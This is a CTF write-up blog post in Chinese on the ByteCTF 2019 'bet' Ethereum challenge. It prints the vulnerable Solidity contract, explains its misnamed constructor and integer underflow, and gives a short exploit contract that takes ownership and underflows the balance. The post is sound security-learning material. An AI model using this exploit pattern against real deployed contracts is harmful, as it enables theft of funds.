bytectf 2019 bet

最新推荐文章于 2022-03-22 23:43:08 发布
最新推荐文章于 2022-03-22 23:43:08 发布
阅读量477 收藏 1
点赞数 1
分类专栏: 区块链 文章标签: 区块链
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rfrder/article/details/115617583
版权

WP

源码:

pragma solidity ^0.4.24;

contract bet {
    uint secret;
    address owner;
    
    mapping(address => uint) public balanceOf;
    mapping(address => uint) public gift;
    mapping(address => uint) public isbet;
    
    event SendFlag(string b64email);
    
    function Bet() public{
        owner = msg.sender;
    }
    
    function payforflag(string b64email) public {
        require(balanceOf[msg.sender] >= 100000);
        balanceOf[msg.sender]=0;
        owner.transfer(address(this).balance);
        emit SendFlag(b64email);
    }
    

    //to fuck
    
    modifier only_owner() {
        require(msg.sender == owner);
        _;
    }
    
    function setsecret(uint secretrcv) only_owner {
        secret=secretrcv;
    }
    
    function deposit() payable{
        uint geteth=msg.value/1000000000000000000;
        balanceOf[msg.sender]+=geteth;
    }
    
    function profit() {
        require(gift[msg.sender]==0);
        gift[msg.sender]=1;
        balanceOf[msg.sender]+=1;
    }
    
    function betgame(uint secretguess){
        require(balanceOf[msg.sender]>0);
        balanceOf[msg.sender]-=1;
        if (secretguess==secret)
        {
            balanceOf[msg.sender]+=2;
            isbet[msg.sender]=1;
        }
    }
    
    function doublebetgame(uint secretguess) only_owner{
        require(balanceOf[msg.sender]-2>0);
        require(isbet[msg.sender]==1);
        balanceOf[msg.sender]-=2;
        if (secretguess==secret)
        {
            balanceOf[msg.sender]+=2;
        }
    }

}

和hf那题差不多,还是大致审一下,首先是Bet函数,可以设owner为我们自己。

    function Bet() public{
        owner = msg.sender;
    }

因此最后的被only_owner修饰的doublebetgame就可以用了。
而且doublebetgame存在问题:require(balanceOf[msg.sender]-2>0);只要msg.sender不是2就恒成立。因此后面的balanceOf[msg.sender]-=2;存在下溢出。但是利用的前提是require(isbet[msg.sender]==1);isbet的设置是在betgame函数中,需要余额大于0而且输入的secretguess和真的secret相等。前面的profit函数可以获得1块钱,而setsecret函数则可以设置secret,因此至此也就理清楚了。

写个EXP:

pragma solidity ^0.4.24;

interface bet{

    function Bet() external;
    function payforflag() external;
    function setsecret(uint secretrcv)external;
    function deposit() payable external;
    
    function profit() external;
    
    function betgame(uint secretguess) external;
    
    function doublebetgame(uint secretguess) external;
}

contract attack{
    bet constant private target = bet(0x9280780d85577027AB8754e329D6E5Bf267007E6);
    function startAttack() public {
        target.Bet();
        target.setsecret(123);
        target.profit();
        target.betgame(123);
        target.betgame(1);
        target.doublebetgame(1);
        // payforflag
    }
}

因此是本地复现,最后就没有执行payforflag了。
在这里插入图片描述

bfengj
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2019年英超所有比赛角球数据
03-28
2019年英超所有比赛的BET365的角球数据和盘口统计,目前独家分享。
byteCTF 2019
合天网安学院
11-25 519
本文作者: z3r0yu 由“合天智汇”公众号首发,未经允许,禁止转载! 0x00 前言 周末的比赛质量还是挺高的,特别是boring_code,有点烧脑但是做的就很开心。 0x01 boring_code 题目描述 http://112.125.25.2:9999 题目解答 题目上来的邮件源码中给了提示,所直接分析目录得到了对应的程序源码 <?php function is_valid_...
ByteCTF2019-notefive WP
qq_41252520的博客
09-28 561
保护 分析 程序有添加、删除、编辑操作。添加的时候限制了大小: 也就是说分配的chunk都在unsortbin以上。 删除没什么问题,主要漏洞只有一个,那就是在编辑中存在off-by-one: 程序没有输出操作,开启了aslr。所以要构造以下攻击链: 利用off-by-one构造heap overlaping。 利用unsortbin attack改写global_max...
bytectf 2019 hf
feng的博客
04-12 534
知识点 整形下溢出 Uninitialized Storage Pointer WP 源码: pragma solidity ^0.4.24; contract hf { address secret; uint count; address owner; mapping(address => uint) public balanceOf; mapping(address => uint) public gift; str
ByteCTF 2019部分WP
合天网安学院
09-12 496
0x00 前言周末的比赛质量还是挺高的,特别是boring_code,有点烧脑但是做的就很开心。0x01 boring_code题目描述http://112.125.25.2:9999题...
[ByteCTF 2019]EZCMS 详解(hash长度扩展攻击+phar反序列化)
qq_45699846的博客
03-22 1854
[ByteCTF 2019]EZCMS 详解(hash长度扩展攻击+phar反序列化)
2019BET公司面试题目大汇总
WangY.H
05-30 9673
【1】百度提前批一面(c++开发): 1.关键字static作用,函数加static和不加static区别 2.const关键字作用,const和宏定义有什么区别,用哪个?(宏定义太多会导致代码膨胀) 3.虚函数是如何实现的? 4.线程和进程的区别,线程如何实现同步和通信,进程如何实现通信? 5.了解哪些线程模型? 6.手写二叉树中序遍历递归和非递归。 7.socket如何进行通信? 8.poll...
2019年各个BET单位的归并排序面试题+面试经验
WangY.H
05-25 740
【1】微软2010年笔试题 在一个排列中,如果一对数的前后位置与大小顺序相反,即前面的数大于后面的数,那么它们就称为一个逆序数对。 一个排列中逆序的总数就称为这个排列的逆序数。如{2,4,3,1}中,2和1,4和3,4和1,3和1是逆序数对,因此 整个数组的逆序数对个数为4,现在给定一数组,要求统计出该数组的逆序数对个数。计算数列的逆序数对个数最简 单的方便就最从前向后依次统计每个数字与它后面的数...
2019BET公司程序员面试必备:算法研究、编程艺术、红黑树、机器学习总结大全
WangY.H
05-25 1194
一、微软面试100题系列 https://blog.csdn.net/v_JULY_v/article/details/6543438 A、横空出世,席卷Csdn--评微软等数据结构+算法面试100题 (微软面试100题系列原题+答案索引) B、微软100题 (微软面试完整第1-100题) C、微软面试100题2010年版全部答案集锦(含下载地址) D、全新整理:微软、谷歌、百度等...
matlab中cond为啥比bet好,关于dpabi中bet步骤
weixin_39856269的博客
03-20 543
严老师:您好!我用dpabi做了一批数据,共有18个subject,其中前9个在bet这一步都可以过去,但后9个在这一步就会报错(后9个subject每一个我都单独做了一下这一步),matlab报错信息如下:Bet begin...Chris Rorden's dcm2nii :: 1 April 2010reading preferences file D:\Program_Filess\DPA...
ransac.zip_RANSAC_bet
09-21
use ransac to find the bet fitted plane
bet
03-10
bet
bet-converter
04-09
betconverter 怎么跑 cd进入项目目录 创建一个虚拟环境并激活它 pip install -m requirements.txt(获取所有使用的工具和软件包) 运行uvicorn api.main:app --reload 测试端点 贡献 该代码目前处于意大利面条式...
p8net bet LINUX 云版本 1.b.1
09-15
主要介绍了p8net bet LINUX 云版本 1.b.1,需要的朋友可以参考下
Ethernaut 靶场刷题(上)
feng的博客
04-12 2541
前言 看了一下ctfwiki上的,前面的知识点看起来还算不那么费劲,但是突然就是学个几天就开始上手比赛题属实太难了。。。所以先从简单的区块链靶场刷起,循序渐进,慢慢学习区块链的相关知识。 靶场链接: The Ethernaut Hello Ethernaut 算是新手教程了,具体的前面的一些搭建,还有获取Rinkeby环境下的ETH的方式就不说了,靶场上也都说的比较清楚了。用help()可以得到一些常用的帮助,因为异步的问题,我们需要在函数前面加上await。 contract可以查看合约对象: cont
Solidity中Storage
feng的博客
04-14 2432
插槽(slot) 静态大小的变量(除 映射mapping 和动态数组之外的所有类型)都从位置 0 开始连续放置在 存储storage 中。如果可能的话,存储大小少于 32 字节的多个变量会被打包到一个 存储插槽storage slot 中。 通俗的理解就相当于每个合约都有一个storage,静态大小的变量都会放在其中,从位置0开始,甚至可以举个不太恰当的例子,就是编程语言中的数组,每个数组元素可能就相当于静态变量,依次存在storage(类比数组)中,从索引0开始。但是和数组不同的是,solidity的静态
Solidity中 函数选择器及参数编码
feng的博客
04-09 1998
学习文章 应用二进制接口说明 官方文档中的应用二进制接口部分内容。前面部分摘录自官方文档,主要是对后面参数编码进行学习和理解。 函数选择器 一个函数调用数据的前 4 字节,指定了要调用的函数。这就是某个函数签名的 Keccak 哈希的前 4 字节(高位在左的大端序) (译注:这里的“高位在左的大端序“,指最高位字节存储在最低位地址上的一种串行化编码方式,即高位字节在左)。 这种签名被定义为基础原型的规范表达,基础原型即是函数名称加上由括号括起来的参数类型列表,参数类型间由一个逗号分隔开,且没有空格。 类型
Ethernaut 靶场刷题(下)
feng的博客
04-16 1500
Gatekeeper Two 又学到了新东西。源码: pragma solidity ^0.6.0; contract GatekeeperTwo { address public entrant; modifier gateOne() { require(msg.sender != tx.origin); _; } modifier gateTwo() { uint x; assembly { x := extcodesize(caller()) }
怎么进入bet365网站
最新发布
02-06
要进入 bet365 网站,你需要打开你的浏览器(例如 Google Chrome、Mozilla Firefox 或 Safari),然后在地址栏里输入 bet365 网站的 URL,即:https://www.bet365.com/ 。按下回车键即可进入网站。 注意:在某些...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值